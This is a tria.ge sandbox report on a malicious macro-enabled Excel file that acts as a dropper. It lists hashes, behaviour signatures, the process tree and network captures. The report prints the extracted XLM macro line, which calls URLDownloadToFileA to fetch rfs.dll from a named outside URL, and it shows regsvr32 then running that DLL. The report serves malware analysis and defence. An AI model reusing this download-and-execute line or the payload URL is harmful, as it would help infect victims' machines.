Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

10

b834ae0cc9...6.xlsm

windows7-x64

10

b834ae0cc9...6.xlsm

windows10-2004-x64

10

Analysis

  • max time kernel
    118s
  • max time network
    129s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    20/11/2024, 18:53 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    b834ae0cc998615fa9a21eded0af0d8009167d77b10fad933d0d5f35b38c1fb6.xlsm

  • Size

    30KB

  • MD5

    80aef7edfc9c272322aaea7038f55657

  • SHA1

    4d9557ec54d47beb0a0d2eee419d7ee9101b4c06

  • SHA256

    b834ae0cc998615fa9a21eded0af0d8009167d77b10fad933d0d5f35b38c1fb6

  • SHA512

    0fb2ef79c7e2f40d0eab8c13b4ca5021371b43830d8ce62b48653655bbfda74f44b16a114b251ea6cae06506a6bc3491846b9773a76e5bdc85f2597ebeed004e

  • SSDEEP

    384:n842JZPFhNjtOA7icg0SCdiVH2KgUrNU/qWhZOdBNPJM+kqr9eCgh0k5M2E6v:gHFhNZliH2ydFfPdkqstJhE6v

Score
10/10
discovery

Malware Config

Extracted

Language
xlm4.0
Source
1
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "http://henrysfreshroast.com/6cc4ts0bkrOlXq/", "..\rfs.dll")
URLs
xlm40.dropper

http://henrysfreshroast.com/6cc4ts0bkrOlXq/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Enumerates system info in registry 2 TTPs 1 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of WriteProcessMemory 7 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\b834ae0cc998615fa9a21eded0af0d8009167d77b10fad933d0d5f35b38c1fb6.xlsm
    1⤵
    • System Location Discovery: System Language Discovery
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1848
    • C:\Windows\SysWow64\regsvr32.exe
      C:\Windows\SysWow64\regsvr32.exe -s ..\rfs.dll
      2⤵
      • Process spawned unexpected child process
      • System Location Discovery: System Language Discovery
      PID:2784

Network

  • flag-us
    DNS
    henrysfreshroast.com
    EXCEL.EXE
    Remote address:
    8.8.8.8:53
    Request
    henrysfreshroast.com
    IN A
    Response
    henrysfreshroast.com
    IN A
    138.207.69.73
  • flag-us
    GET
    http://henrysfreshroast.com/6cc4ts0bkrOlXq/
    EXCEL.EXE
    Remote address:
    138.207.69.73:80
    Request
    GET /6cc4ts0bkrOlXq/ HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: henrysfreshroast.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 301 Moved Permanently
    Content-Type: text/html; charset=UTF-8
    Location: https://henrysfreshroast.com/index.php
    Server: Microsoft-IIS/10.0
    X-Powered-By: ASP.NET
    Date: Wed, 20 Nov 2024 18:53:28 GMT
    Content-Length: 161
  • flag-us
    GET
    https://henrysfreshroast.com/index.php
    EXCEL.EXE
    Remote address:
    138.207.69.73:443
    Request
    GET /index.php HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Connection: Keep-Alive
    Host: henrysfreshroast.com
    Response
    HTTP/1.1 301 Moved Permanently
    Content-Type: text/html; charset=UTF-8
    Location: https://henrysfreshroast.com/
    Server: Microsoft-IIS/10.0
    X-Powered-By: PHP/7.4.33
    X-Redirect-By: WordPress
    X-Powered-By: ASP.NET
    Date: Wed, 20 Nov 2024 18:53:31 GMT
    Content-Length: 0
  • flag-us
    GET
    https://henrysfreshroast.com/
    EXCEL.EXE
    Remote address:
    138.207.69.73:443
    Request
    GET / HTTP/1.1
    Accept: */*
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Connection: Keep-Alive
    Host: henrysfreshroast.com
    Response
    HTTP/1.1 200 OK
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    Content-Type: text/html; charset=UTF-8
    Content-Encoding: gzip
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Vary: Accept-Encoding
    Server: Microsoft-IIS/10.0
    X-Powered-By: PHP/7.4.33
    Link: <https://henrysfreshroast.com/index.php/wp-json/>; rel="https://api.w.org/"
    Link: <https://henrysfreshroast.com/index.php/wp-json/wp/v2/pages/7>; rel="alternate"; title="JSON"; type="application/json"
    Link: <https://henrysfreshroast.com/>; rel=shortlink
    Set-Cookie: PHPSESSID=b0j1h96udd37jgc4ierdkfonlv; path=/
    X-Powered-By: ASP.NET
    Date: Wed, 20 Nov 2024 18:53:33 GMT
    Content-Length: 14327
  • flag-us
    DNS
    r10.o.lencr.org
    EXCEL.EXE
    Remote address:
    8.8.8.8:53
    Request
    r10.o.lencr.org
    IN A
    Response
    r10.o.lencr.org
    IN CNAME
    o.lencr.edgesuite.net
    o.lencr.edgesuite.net
    IN CNAME
    a1887.dscq.akamai.net
    a1887.dscq.akamai.net
    IN A
    88.221.135.105
    a1887.dscq.akamai.net
    IN A
    88.221.134.137
  • flag-gb
    GET
    http://r10.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBRpD%2BQVZ%2B1vf7U0RGQGBm8JZwdxcgQUdKR2KRcYVIUxN75n5gZYwLzFBXICEgMw0udgc4EKbgVKThyDA6Ignw%3D%3D
    EXCEL.EXE
    Remote address:
    88.221.135.105:80
    Request
    GET /MFMwUTBPME0wSzAJBgUrDgMCGgUABBRpD%2BQVZ%2B1vf7U0RGQGBm8JZwdxcgQUdKR2KRcYVIUxN75n5gZYwLzFBXICEgMw0udgc4EKbgVKThyDA6Ignw%3D%3D HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Microsoft-CryptoAPI/6.1
    Host: r10.o.lencr.org
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Content-Type: application/ocsp-response
    Content-Length: 504
    ETag: "5FB25E8FC1881C91EE426FD437B4D9BF1DFB0AAB5F8BD4FBFCD0F8C72F609C9C"
    Last-Modified: Tue, 19 Nov 2024 16:55:00 UTC
    Cache-Control: public, no-transform, must-revalidate, max-age=20899
    Expires: Thu, 21 Nov 2024 00:41:48 GMT
    Date: Wed, 20 Nov 2024 18:53:29 GMT
    Connection: keep-alive
  • flag-us
    DNS
    crl.microsoft.com
    Remote address:
    8.8.8.8:53
    Request
    crl.microsoft.com
    IN A
    Response
    crl.microsoft.com
    IN CNAME
    crl.www.ms.akadns.net
    crl.www.ms.akadns.net
    IN CNAME
    a1363.dscg.akamai.net
    a1363.dscg.akamai.net
    IN A
    104.86.110.66
    a1363.dscg.akamai.net
    IN A
    104.86.110.81
  • flag-gb
    GET
    http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
    Remote address:
    104.86.110.66:80
    Request
    GET /pki/crl/products/MicRooCerAut2011_2011_03_22.crl HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    If-Modified-Since: Thu, 11 Jul 2024 01:45:51 GMT
    User-Agent: Microsoft-CryptoAPI/6.1
    Host: crl.microsoft.com
    Response
    HTTP/1.1 200 OK
    Content-Length: 1036
    Content-Type: application/octet-stream
    Content-MD5: 8M9bF5Tsp81z+cAg2quO8g==
    Last-Modified: Thu, 26 Sep 2024 02:21:11 GMT
    ETag: 0x8DCDDD1E3AF2C76
    Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
    x-ms-request-id: 50df83b2-f01e-004c-4bc4-0fc7da000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Wed, 20 Nov 2024 18:54:01 GMT
    Connection: keep-alive
  • flag-us
    DNS
    www.microsoft.com
    Remote address:
    8.8.8.8:53
    Request
    www.microsoft.com
    IN A
    Response
    www.microsoft.com
    IN CNAME
    www.microsoft.com-c-3.edgekey.net
    www.microsoft.com-c-3.edgekey.net
    IN CNAME
    www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
    www.microsoft.com-c-3.edgekey.net.globalredir.akadns.net
    IN CNAME
    e13678.dscb.akamaiedge.net
    e13678.dscb.akamaiedge.net
    IN A
    95.100.245.144
  • flag-gb
    GET
    http://www.microsoft.com/pkiops/crl/MicCodSigPCA2011_2011-07-08.crl
    Remote address:
    95.100.245.144:80
    Request
    GET /pkiops/crl/MicCodSigPCA2011_2011-07-08.crl HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    If-Modified-Since: Sun, 18 Aug 2024 00:23:49 GMT
    User-Agent: Microsoft-CryptoAPI/6.1
    Host: www.microsoft.com
    Response
    HTTP/1.1 200 OK
    Content-Length: 1078
    Content-Type: application/octet-stream
    Content-MD5: PjrtHAukbJio72s77Ag5mA==
    Last-Modified: Thu, 31 Oct 2024 23:26:09 GMT
    ETag: 0x8DCFA0366D6C4CA
    x-ms-request-id: a5750a07-601e-002c-42ee-2bbb45000000
    x-ms-version: 2009-09-19
    x-ms-lease-status: unlocked
    x-ms-blob-type: BlockBlob
    Date: Wed, 20 Nov 2024 18:54:01 GMT
    Connection: keep-alive
    TLS_version: UNKNOWN
    ms-cv: CASMicrosoftCV14a1efef.0
    ms-cv-esi: CASMicrosoftCV14a1efef.0
    X-RTag: RT
  • 138.207.69.73:80
    http://henrysfreshroast.com/6cc4ts0bkrOlXq/
    http
    EXCEL.EXE
    662 B
     960 B
     7
    4

    HTTP Request

    GET http://henrysfreshroast.com/6cc4ts0bkrOlXq/

    HTTP Response

    301
  • 138.207.69.73:443
    https://henrysfreshroast.com/
    tls, http
    EXCEL.EXE
    1.8kB
     19.6kB
     16
    21

    HTTP Request

    GET https://henrysfreshroast.com/index.php

    HTTP Response

    301

    HTTP Request

    GET https://henrysfreshroast.com/

    HTTP Response

    200
  • 88.221.135.105:80
    http://r10.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBRpD%2BQVZ%2B1vf7U0RGQGBm8JZwdxcgQUdKR2KRcYVIUxN75n5gZYwLzFBXICEgMw0udgc4EKbgVKThyDA6Ignw%3D%3D
    http
    EXCEL.EXE
    469 B
     1.0kB
     5
    3

    HTTP Request

    GET http://r10.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBRpD%2BQVZ%2B1vf7U0RGQGBm8JZwdxcgQUdKR2KRcYVIUxN75n5gZYwLzFBXICEgMw0udgc4EKbgVKThyDA6Ignw%3D%3D

    HTTP Response

    200
  • 104.86.110.66:80
    http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl
    http
    399 B
     1.7kB
     4
    4

    HTTP Request

    GET http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl

    HTTP Response

    200
  • 95.100.245.144:80
    http://www.microsoft.com/pkiops/crl/MicCodSigPCA2011_2011-07-08.crl
    http
    393 B
     1.7kB
     4
    4

    HTTP Request

    GET http://www.microsoft.com/pkiops/crl/MicCodSigPCA2011_2011-07-08.crl

    HTTP Response

    200
  • 8.8.8.8:53
    henrysfreshroast.com
    dns
    EXCEL.EXE
    66 B
     82 B
     1
    1

    DNS Request

    henrysfreshroast.com

    DNS Response

    138.207.69.73

  • 8.8.8.8:53
    r10.o.lencr.org
    dns
    EXCEL.EXE
    61 B
     160 B
     1
    1

    DNS Request

    r10.o.lencr.org

    DNS Response

    88.221.135.105
    88.221.134.137

  • 8.8.8.8:53
    crl.microsoft.com
    dns
    63 B
     162 B
     1
    1

    DNS Request

    crl.microsoft.com

    DNS Response

    104.86.110.66
    104.86.110.81

  • 8.8.8.8:53
    www.microsoft.com
    dns
    63 B
     230 B
     1
    1

    DNS Request

    www.microsoft.com

    DNS Response

    95.100.245.144

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\rfs.dll
    Filesize

    56KB

    MD5

    d5cbf3235a39c09c9d292dafdf0393a5

    SHA1

    ae109e202e6f0965b47f38ee29b3725800939a9f

    SHA256

    208d15c175407bc56c9e1d1a6e31290cf8c04fe1da742e4ad0dbe06960b7f1dd

    SHA512

    202212aeb1cabe772e05ec7649b83be4a04b68b644a1621993e91e370dc0b9de268ea50f0dab3a74178ecb648d06b5173222d3ed1f0e31d04abeded020b079bd

    Download Submit

  • memory/1848-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

    Filesize

    64KB

    Download

  • memory/1848-1-0x0000000072A4D000-0x0000000072A58000-memory.dmp

    Filesize

    44KB

    Download

  • memory/1848-5-0x0000000072A4D000-0x0000000072A58000-memory.dmp

    Filesize

    44KB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.